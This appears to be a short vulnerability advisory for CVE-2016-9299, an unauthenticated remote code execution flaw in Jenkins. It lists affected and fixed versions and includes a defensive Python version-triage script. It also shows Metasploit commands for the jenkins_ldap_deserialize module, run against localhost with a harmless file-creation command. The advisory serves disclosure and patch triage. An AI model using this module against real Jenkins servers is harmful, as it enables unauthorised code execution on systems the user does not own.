Jenkins CLI Ldap Deser CVE-2016-9299

Vulnerability name

Unauthenticated remote code execution vulnerability in Jenkins

Affected versions

  • All versions before LTS Release 2.19.3
  • All versions before Weekly Release 2.32

Fixed versions

  • mainline 2.32
  • LTS 2.19.3
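
An added triage helper (not part of the original post or of the Jenkins project) that applies the affected and fixed boundaries listed above to an inventory of version strings. It assumes three-component versions are LTS releases and two-component versions are weekly releases; the host names and versions in the sample inventory are constructed.

```python
import re

# Fixed releases as listed on this page.
FIXED_LTS = (2, 19, 3)
FIXED_WEEKLY = (2, 32)

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?$")


def classify(version):
    """Return (release_line, affected) for a Jenkins version string.

    Assumption: x.y.z is an LTS release and x.y is a weekly release, so each
    is compared only against the fix on its own line.
    """
    match = _VERSION_RE.match(version.strip())
    if match is None:
        raise ValueError("unrecognised Jenkins version: %r" % version)
    parts = tuple(int(p) for p in match.groups() if p is not None)
    if len(parts) == 3:
        return "lts", parts < FIXED_LTS
    return "weekly", parts < FIXED_WEEKLY


def triage(inventory):
    """Map each host to 'affected', 'fixed' or 'unknown'."""
    report = {}
    for host, version in inventory.items():
        try:
            _, affected = classify(version)
        except ValueError:
            report[host] = "unknown"  # e.g. snapshot or custom builds
        else:
            report[host] = "affected" if affected else "fixed"
    return report


# Constructed sample inventory (hypothetical hosts and versions).
SAMPLE_INVENTORY = {
    "ci-a": "2.19.2",  # LTS below 2.19.3
    "ci-b": "2.19.4",  # LTS above the fix, although numerically below 2.32
    "ci-c": "2.20",    # weekly below 2.32, although numerically above 2.19.3
    "ci-d": "2.32",
    "ci-e": "2.32-SNAPSHOT",
}

if __name__ == "__main__":
    for host, status in sorted(triage(SAMPLE_INVENTORY).items()):
        print(host, status)
```

Comparing every version against a single threshold would misclassify hosts such as `ci-b` and `ci-c`, which is why the two release lines are checked separately.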

Impact

Remote code execution

Exploit

https://github.com/rapid7/metasploit-framework/pull/7815

Reproduction


    msf > use exploit/linux/misc/jenkins_ldap_deserialize
    msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
    RHOST => 127.0.0.1
    msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
    PAYLOAD => cmd/unix/generic
    msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
    CMD => touch /tmp/wtf
    msf exploit(jenkins_ldap_deserialize) > run
    [*] Exploit completed, but no session was created.

Success

    [~] ls /tmp/wtf
    /tmp/wtf

References
